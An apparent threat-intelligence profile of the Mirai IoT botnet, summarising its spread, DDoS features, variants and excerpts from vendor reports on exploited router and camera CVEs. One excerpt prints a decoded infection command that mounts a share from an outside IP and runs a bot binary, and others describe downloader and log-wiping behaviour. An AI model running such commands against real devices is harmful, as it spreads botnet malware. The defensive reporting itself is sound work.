Mirai is a Linux-based IoT botnet malware family first observed in 2016 that compromises internet-exposed devices such as routers, IP cameras, DVRs, and other embedded systems, enrolling them into remotely controlled botnets primarily used for distributed denial-of-service attacks. Its source code leak in 2016 led to extensive proliferation of variants and derivative families, making Mirai one of the most influential and widely reused codebases in the IoT malware ecosystem.
Mirai is best known for scanning for exposed services, especially Telnet, and using brute-force credential attacks against weak or default logins to gain access to devices. Variants and related campaigns have also spread through exploitation of known vulnerabilities in routers, cameras, servers, and other edge devices, including command-injection and remote-code-execution flaws. After compromise, Mirai commonly downloads architecture-specific binaries for the victim device, executes them, and connects the host to command-and-control infrastructure.
Core Mirai functionality centers on botnet enrollment and DDoS operations. Mirai-derived malware commonly supports multiple flood methods across TCP, UDP, GRE, DNS, ICMP, and HTTP. Many variants also include process-killing, single-instance enforcement, log or shell-history cleanup, and firewall or access-control changes intended to retain control of the device and hinder remediation or competing malware. The family has repeatedly targeted Linux-based embedded and gateway devices and has also been observed in campaigns affecting exposed Linux servers.
Mirai has served as the foundation for numerous later botnets and variants, including families and campaigns such as IZ1H9, Murdoc Botnet, DvrHelper, Evooo1Bot, LiquorBot, and code-reuse by EnemyBot. Some descendants preserve Mirai’s DDoS engine while adding capabilities such as encrypted command and control, SSH brute forcing, credential sniffing, proxying, exploit dispatch, interactive shell access, persistence, and cryptocurrency mining. Mirai and its variants remain a persistent threat to consumer and enterprise edge infrastructure worldwide.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
34 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
there are credible reports from other sources that several automated botnets (such as Mirai, Tsunami, and Kinsing) have begun to exploit it as well
This botnet also uses some existing exploits (CVE-2024-7029, CVE-2017-17215) to download the next-stage payloads. Figure 4: Huawei Exploit inside binary (CVE-2017-17215) | The Qualys Threat Research Unit has uncovered a large-scale, ongoing operation within the Mirai campaign, dubbed Murdoc Botnet.
The flaw, tracked as CVE-2024-7029, has been confirmed to impact Avtech AVM1203 IP cameras running firmware versions FullImg-1023-1007-1011-1009 and prior, but other cameras and NVRs made by the Taiwan-based company may also be affected. “Commands can be injected over the network and executed without authentication,” CISA said, noting that the bug is remotely exploitable and that it’s aware of exploitation. | The vulnerability is being abused to spread malware. The malware appears to be a Mirai variant.
CVE-2023-26802: DCN DCBI-Netlog-LAB remote code execution vulnerability ... The exploit was detected on April 10, 2023. The exploit works due to the Digital China Network DCBI-Netlog-LAB nsg_masq.cgi component failing to adequately sanitize the user-supplied input data, which leads to remote command execution.
Dr Cyborkian a.k.a. janit0r did confess in an anonymous post that it was a rather difficult step to sabotage other people’s equipment just to prove his point. But he then goes on to say that the colossally dangerous CVE-2016-10372 situation ultimately left him with no other choice but to go head on with to the threats encountered by the Mirai Botnet.
CVE-2023-26801: LB-Link command injection vulnerability ... We captured this exploit traffic on April 10, 2023. The exploit targets a command injection vulnerability in the LB-Link wireless router’s /goform/set_LimitClinet_cfg component, which does not successfully sanitize the user input in the time1, time2 and mac parameters.
CVE-2023-27076: Tenda G103 command injection vulnerability ... This malicious traffic was first detected as a part of the IZ1H9 campaign on April 10, 2023. The command injection vulnerability is due to the failure to sanitize the value of the language parameter in the cgi-bin/luci interface of Tenda G103.
公開されたCensysのブログ記事、NICTER解析チームの発信情報から、この増加はcPanel/WHMの脆弱性(CVE-2026-41940)を悪用したMirai/Mirai亜種への感染活動によるものではないかと考えています。この脆弱性は認証をバイパスしてシステムを悪用される恐れを持つもので、Mirai/Mirai亜種の感染以外にも被害が報じられています。 | 2026年5月初旬に観測されたMiraiの特徴を持つ23/TCP宛てのパケットの急増…この増加はcPanel/WHMの脆弱性(CVE-2026-41940)を悪用したMirai/Mirai亜種への感染活動によるものではないかと考えています。
Roughly a week ago, a critical exploit CVE-2018–10561 found in over a million GPON home routers was reported along with POC explanation. Attackers wasted little time on taking advantage of this exploit as NewSky Security has already observed two unrelated attempted attacks by now.
CVE-2014-8361 ... Different devices using the Realtek SDK with the miniigd daemon | The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
the Omni botnet, a variant of Mirai, was found exploiting two vulnerabilities affecting Dasan GPON routers - CVE-2018-10561 (authentication bypass) and CVE-2018-1562/10562 (command injection). The two vulnerabilities used in conjunction allow the execution of commands sent by an unauthenticated remote attacker to a vulnerable device. | The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
2019年11月9号,我们监测到攻击者使用第一个Tenda路由器0-day漏洞(CVE-2018-14558 & CVE-2020-10987),传播Ttint样本。
Hikvision is a CVE CNA and quickly assigned the CVE number, CVE-2021-36260 and released a patch for the vulnerability on the same day as the threat researcher’s disclosure... During our analysis, we observed numerous payloads attempting to leverage this vulnerability... One payload in particular caught our attention. It tries to drop a downloader that exhibits infection behavior and that also executes Moobot... CVE-2021-36260 results from insufficient input validation, allowing unauthenticated users to inject malicious content into a <language> tag to trigger a command injection attack on a Hikvision product.
2019年11月9号,我们监测到攻击者使用第一个Tenda路由器0-day漏洞(CVE-2018-14558 & CVE-2020-10987),传播Ttint样本。
Echobot added four exploits to its arsenal from 2019, while the latest one is from August 2019, targeting Webmin Linux/Unix administration panel (CVE-2019-15107).
We have observed exploits in the wild for a recently disclosed command injection vulnerability affecting WebSVN... Palo Alto Networks Next-Generation Firewalls protect customers from the exploitation of CVE-2021-32305... Shortly after CVE-2021-32305 was made public, Unit 42 researchers observed attackers exploiting it in the wild. | A proof of concept was released and within a week, on June 26, 2021, attackers exploited the vulnerability to deploy variants of the Mirai DDoS malware.
this version of Echobot adds an outstanding exploit for CVE-2019-14927, which targets Mitsubishi Electric‘s Remote Terminal Unit (RTU).
The vulnerabilities being exploited in the wild by this new Mirai variant for the first time are listed below... CVE-2018-11510... Appendix: CVE-2018-11510 Asustor NAS Devices | Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016.
The vulnerabilities being exploited in the wild by this new Mirai variant for the first time are listed below... CVE-2018-7841... Appendix: Schneider Electric U.motion LifeSpace Management Systems | Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016.
The vulnerabilities being exploited in the wild by this new Mirai variant for the first time are listed below... CVE-2018-6961... Appendix: CVE-2018-6961 VMware NSX SD-WAN Edge < 3.1.2 | Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016.
In early August, Unit 42 researchers discovered attacks leveraging several vulnerabilities in devices made by D-Link... The vulnerabilities exploited include: CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability... The exploit targeting the older D-Link routers takes advantage of vulnerabilities in the HNAP SOAP interface. An attacker can perform code execution through a blind OS command injection.
The vulnerabilities exploited include: CVE-2022-28958: D-Link Remote Command Execution Vulnerability... The exploit targets a remote command execution vulnerability in the /shareport.php component. The component does not successfully sanitize the value of the HTTP parameter value, which can lead to arbitrary command execution.
The vulnerabilities being exploited in the wild by this new Mirai variant for the first time are listed below... CVE-2017-5174... Appendix: CVE-2017-5174 Geutebrück IP Cameras | Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016.
The vulnerabilities exploited include: CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability... The exploit works due to the older D-Link router's unsanitized use of the “service” parameters in requests made to the SOAP interface. The vulnerability can be exploited to allow unauthenticated remote code execution.
These new samples also include exploits targeting the Oracle WebLogic Servers RCE vulnerability... AutoFocus customers can track these activities using individual exploit tags... CVE-2019-2725... Appendix: CVE-2019-2725 Oracle WebLogic Servers | Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016.
The vulnerabilities exploited include: CVE-2022-26258: D-Link Remote Command Execution Vulnerability... The exploit targets a command injection vulnerability in the /lan.asp component. The component does not successfully sanitize the value of the HTTP parameter DeviceName, which in turn can lead to arbitrary command execution.
The vulnerabilities being exploited in the wild by this new Mirai variant for the first time are listed below... CVE-2019-3929... Appendix: CVE-2019-3929 ... Wireless Presentation Systems from several vendors | Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016.
The new samples also include four exploits which have only been used by Mirai in the past: LG Supersign TVs... AutoFocus customers can track these activities using individual exploit tags... CVE-2018-17173... Appendix: CVE-2018-17173 LG Supersign TVs | Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016.
Possibly CVE-2019-19356 (a Netis WF2419 wireless router exploit). | On Feb. 23, 2021, one of the IPs involved in the attack was updated to serve a Mirai variant leveraging CVE-2021-27561 and CVE-2021-27562, mere hours after vulnerability details were published.
CVE-2018-20062, is an RCE vulnerability in ThinkPHP. This exploit has frequently been used by Mirai variants in the wild since its public disclosure, however this is the first observed use of it by Hide 'N Seek. | While the ThinkPHP exploit has already been seen employed by several Mirai variants, the only other instance of the CVE-2019-7238 vulnerability being exploited in the wild has been by the DDG botnet.
On Feb. 23, 2021, one of the IPs involved in the attack was updated to serve a Mirai variant leveraging CVE-2021-27561 and CVE-2021-27562, mere hours after vulnerability details were published.
On Feb. 23, 2021, one of the IPs involved in the attack was updated to serve a Mirai variant leveraging CVE-2021-27561 and CVE-2021-27562, mere hours after vulnerability details were published.
On March 3, 2021, the same samples were served from a third IP address, with the addition of an exploit leveraging CVE-2021-22502. | On Feb. 23, 2021, one of the IPs involved in the attack was updated to serve a Mirai variant leveraging CVE-2021-27561 and CVE-2021-27562, mere hours after vulnerability details were published.
As soon as the proof-of-concept (PoC) for CVE-2020-9054 was made publicly available last month, this vulnerability was promptly abused to infect vulnerable versions of Zyxel network-attached storage (NAS) devices with a new Mirai variant - Mukashi.
11 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
All the samples are classified as Gafgyt or Mirai by most detection engines.
Satori, also known as “Masuta,” is a variant of the Mirai botnet, a powerful IoT malware strain that first came online in July 2016.
The publication of proof-of-concept (PoC) exploit code in a public vulnerabilities database has lead to increased activity from Mirai-based IoT botnets... Attackers are using the above PoC to break into exposed devices and infect them with Mirai.
The publication of proof-of-concept (PoC) exploit code in a public vulnerabilities database has lead to increased activity from Mirai-based IoT botnets... Attackers are using the above PoC to break into exposed devices and infect them with Mirai.
Even Killnet relies on volunteer cyber partisans, but its structure also includes dedicated sub-groups leveraging IoT botnet infrastructures such as Mirai.
FBI Director Chris Wray last Wednesday disclosed an operation to disrupt a Mirai-variant botnet that has exploited more than 260,000 IoT devices globally.
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Those commands are used to download and execute malicious payload from remote C2 servers to deploy bots on new victim devices. | The vulnerable devices lack a check on the htmlNtpServer parameter of /cgi-bin/timeconfig.py, allowing attackers to inject commands via crafted HTTP requests and have them executed on victim’s devices.
Figure 6: Base64 encoded commands The decoded base64 encoded payload is: cd /tmp; mkdir skid; mount -o intr,nolock,tcp,exec 45.148.121.58:/root/static skid; cd skid; ./meow.arm5 avtech;
If executed, the shell script downloader would first delete logs to hide its tracks.
Using the wget/ftpget command, fetches the shellscript file. Executes it and removes it.
For SSH and telnet channels, IZ1H9 inherits the most significant feature from the original Mirai source code: a data section with embedded default login credentials for scanner and brute-force purposes.
features: ... mirai syn scanner ran if root qbot scanner ran if non root ...
The malware checks the running process names on the infected host to terminate them.
Recently, we’ve seen that Mirai is widening its distribution capabilities through a Windows Trojan that scans for more ports than previous versions. It checks if the following ports are open: 22 (SSH), 23 (Telnet), 135 (DCE/RPC), 445 (Active Directory), 1433 (MSSQL), 3306 (MySQL) and 3389 (RDP).
including brute forcing over telnet, SSH, WMI, SQL injection, and IPC techniques. | Upon successful intrusion, it can spread the Linux Mirai variant as needed over telnet. If tftp or wget are not present on the remote system, it attempts to copy a downloader to the system and executes it there.
The IZ1H9 variant uses a table key during the string decryption process: 0xBAADF00D ... For each encrypted character, the malware performs XOR decryption... The original Mirai and IZ1H9 also both encrypt their login credentials with a 1 byte XOR key.
1,980 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Mirai is referenced as the source code base whose DDoS engine functionality was reused by Evooo1Bot.
Mirai is referenced as the source-code and DDoS-engine foundation reused by Evooo1Bot.
Mirai is referenced as the base malware family from which Evooo1Bot inherits its DDoS engine and broader botnet model for compromising internet-connected devices with weak credentials.
Mirai is referenced as the source framework whose leaked code and DDoS engine were reused by Evooo1Bot.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.